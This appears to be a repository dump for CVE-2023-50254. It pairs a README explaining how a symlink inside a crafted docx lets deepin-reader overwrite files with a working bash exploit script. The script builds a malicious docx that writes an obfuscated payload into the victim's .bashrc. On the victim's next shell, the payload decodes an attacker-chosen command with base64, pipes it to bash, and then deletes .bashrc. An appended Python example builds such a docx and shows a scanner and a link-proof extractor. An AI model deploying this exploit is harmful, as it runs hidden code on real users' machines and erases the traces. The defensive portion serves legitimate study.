├── README.md
└── deepin-reader_exploit.sh

/README.md:
--------------------------------------------------------------------------------
# CVE-2023-50254 - Deepin Linux's default document viewer deepin-reader RCE

CVE-2023-50254: PoC exploit for a deepin-reader RCE that affects unpatched Deepin Linux desktops. Deepin Linux's default document reader, "deepin-reader", suffers from a serious vulnerability due to a design flaw that leads to remote command execution via a crafted docx document.

## Details

Deepin-reader is the default document reader for the Deepin Linux operating system. It performs several shell command operations while handling the docx document format:

1. When opening a docx document, deepin-reader creates a temporary directory under /tmp and places the docx document in that directory.

2. It then calls the `unzip` shell command to extract the docx file.

3. After extraction, deepin-reader calls the `pandoc` command to convert the docx file to an HTML file named `temp.html` under the `word/` directory (created when the docx file is extracted with unzip). The command looks something like `pandoc temp.docx -o word/temp.html`.

4. Finally, deepin-reader converts that HTML file to a PDF and opens the PDF.

This happens whenever a docx file is opened on Deepin Linux.

![image](https://github.com/febinrev/deepin-linux_reader_RCE-exploit/assets/52229330/57fed21a-025b-44d6-83fc-1ab51b2a8946)

This behaviour can be exploited by placing a symlink named `word/temp.html` inside a crafted malicious docx, pointing to any file on the target system that the user running deepin-reader can write to. `unzip` recreates the symlink in the temporary directory, so when pandoc opens `word/temp.html` for writing it follows the link and overwrites the file it points to.

This is an arbitrary file overwrite vulnerability. Remote code execution can be achieved by overwriting files like `.bashrc` or `.bash_login`; the payload then runs when the user next opens a terminal.

Advisory: https://github.com/linuxdeepin/developer-center/security/advisories/GHSA-q9jr-726g-9495

--------------------------------------------------------------------------------
/deepin-reader_exploit.sh:
--------------------------------------------------------------------------------
#!/bin/bash

myBanner(){
echo "
╔╦╗┌─┐┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐
║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘
═╩╝└─┘└─┘┴ ┴┘└┘ ╩╚═└─┘┴ ┴─┴┘└─┘┴└─
╦═╗╔═╗╔═╗ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐
╠╦╝║ ║╣ ║╣ ┌┴┬┘├─┘│ │ ││ │
╩╚═╚═╝╚═╝ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴
0-day

[Affected Operating System: Deepin Linux]
-by Febin (@febin_nj)
"

}

# The crafting step needs pandoc (text -> docx) and zip (to add the symlink member).
checkDeps(){

for tool in pandoc zip
do
    if command -v "$tool" >/dev/null 2>&1
    then
        echo "[+] $tool is installed!"
    else
        echo "[-] $tool is not installed! Install $tool to run this exploit.."
        exit 1
    fi
done
}

mainProgram(){

printf "

[ This Exploit will craft a malicious document (.docx) from the specified TEXT file and store the malicious docx under output/ directory ]

"
mkdir -p output

printf " [>] Path to your TEXT file (default = ./sample.txt): "
read -r html_file
html_file=${html_file:-./sample.txt}

printf " [>] Enter the target username: "
read -r username

printf " [>] Enter the oneliner command to execute on target: "
read -r cmd

if [ -e "$html_file" ]
then
    cp "$html_file" out.html
else
    echo "[-] The specified txt file doesn't exist!"
    exit 1
fi

# -w0 keeps the encoded command on a single line; a wrapped base64 blob would
# split the one-liner across lines once it lands in .bashrc.
b64cmd=$(echo "$cmd" | base64 -w0)

# The payload becomes the first paragraph of the document. On the target, pandoc
# writes it through the word/temp.html symlink into /home/<user>/.bashrc, where an
# interactive bash reads it as: clear the screen, "echo <b64> | base64 -d | bash",
# remove .bashrc to clean up, then exit. The trailing "#" comments out pandoc's
# closing tag. ${IFS} stands in for spaces (bash word-splits it into separators)
# so the line contains no literal whitespace for pandoc's output wrapping to break
# on; the backslashes and ${NULL} (unset, expands to nothing) are obfuscation.
payload="

/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #

"
# Prepend the payload to the decoy text; the command substitution is expanded
# before the redirection truncates out.html.
printf '%s\n %s\n' "$payload" "$(cat out.html)" > out.html

pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html   # uncomment to inspect how pandoc renders the payload

rm -f out.html
mkdir -p word

# zip -y stores the symlink itself (not the file it points to), so the archive
# carries the member word/temp.html -> /home/<user>/.bashrc that unzip recreates.
ln -sf "/home/${username}/.bashrc" word/temp.html
zip -u -y output/mal.docx word/temp.html >/dev/null

rm -rf word/

echo "[+] Malicious document is written to: $(realpath output/mal.docx)"

}

myBanner
checkDeps
mainProgram
--------------------------------------------------------------------------------
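The following is an added example, not code from the original PoC or from deepin-reader. It shows both halves of the technique described in the README: how a docx (a plain zip) carries a symlink member such as `word/temp.html -> ~/.bashrc` in its entry metadata, and the two checks a document viewer should apply before handing such an archive to `unzip` and then writing into the extraction directory (refusing symlink, absolute and `..` members, and opening output files with `O_EXCL|O_NOFOLLOW`). The docx skeleton members, the victim path `/home/victim/.bashrc` and the temporary directory are constructed for the demo.

```python
"""Added example, not code from the original PoC or from deepin-reader.

(1) Build a docx-shaped zip whose word/temp.html member is a symlink.
(2) Scan an archive for members a viewer must not let unzip create.
(3) Extract safely: regular files only, never following links on write.
All member contents and paths below are constructed for the demo.
"""
from __future__ import annotations

import io
import os
import stat
import tempfile
import zipfile
from pathlib import Path, PurePosixPath

# Constructed minimal docx skeleton; real documents carry many more members.
BENIGN_MEMBERS = {
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document/>",
}


def build_docx(symlink: tuple[str, str] | None = None) -> bytes:
    """Return zip bytes for the skeleton, optionally plus one symlink member.

    A zip symlink is an entry whose Unix mode (high 16 bits of external_attr)
    has S_IFLNK set and whose data is the link target; this is what `zip -y`
    writes and what Info-ZIP unzip recreates on extraction.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in BENIGN_MEMBERS.items():
            zf.writestr(name, data)
        if symlink is not None:
            link_name, link_target = symlink
            info = zipfile.ZipInfo(link_name)
            info.create_system = 3  # 3 = Unix, so the mode bits are honoured
            info.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(info, link_target)
    return buf.getvalue()


def unsafe_members(docx_bytes: bytes) -> list[tuple[str, str]]:
    """List (member, reason) pairs that must block extraction:
    symlink entries, absolute paths and '..' traversal components."""
    findings: list[tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                target = zf.read(info).decode("utf-8", errors="replace")
                findings.append((info.filename, f"symlink -> {target}"))
            path = PurePosixPath(info.filename)
            if path.is_absolute() or ".." in path.parts:
                findings.append((info.filename, "path escapes extraction dir"))
    return findings


def extract_safely(docx_bytes: bytes, dest: str) -> list[str]:
    """Extract regular-file members only into `dest`, never following links.

    Skipping symlink entries is the archive-side fix. O_CREAT|O_EXCL|O_NOFOLLOW
    is the filesystem-side fix: a link planted at the output path by any other
    means cannot redirect the write (the reader's own pandoc -o word/temp.html
    step would need the same discipline).
    """
    root = Path(dest).resolve()
    written: list[str] = []
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or stat.S_ISLNK(info.external_attr >> 16):
                continue
            target = (root / info.filename).resolve()
            if root not in target.parents:
                continue  # absolute path or traversal out of dest
            target.parent.mkdir(parents=True, exist_ok=True)
            fd = os.open(target, flags, 0o600)
            with os.fdopen(fd, "wb") as fh:
                fh.write(zf.read(info))
            written.append(info.filename)
    return written


def demo() -> dict:
    """Craft the malicious docx, scan it, and extract it the safe way."""
    evil = build_docx(("word/temp.html", "/home/victim/.bashrc"))  # constructed
    with tempfile.TemporaryDirectory() as tmp:
        extracted = extract_safely(evil, tmp)
        link_planted = os.path.lexists(os.path.join(tmp, "word", "temp.html"))
    return {
        "findings": unsafe_members(evil),
        "extracted": sorted(extracted),
        "link_planted": link_planted,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block prints one symlink finding for `word/temp.html`, shows that only the two regular members were extracted, and confirms no link was planted in the extraction directory. The `unsafe_members` check is the cheap gate to run before `unzip`; `extract_safely` is what replacing the `unzip` call with an in-process extractor looks like when the write path itself has to stay link-proof.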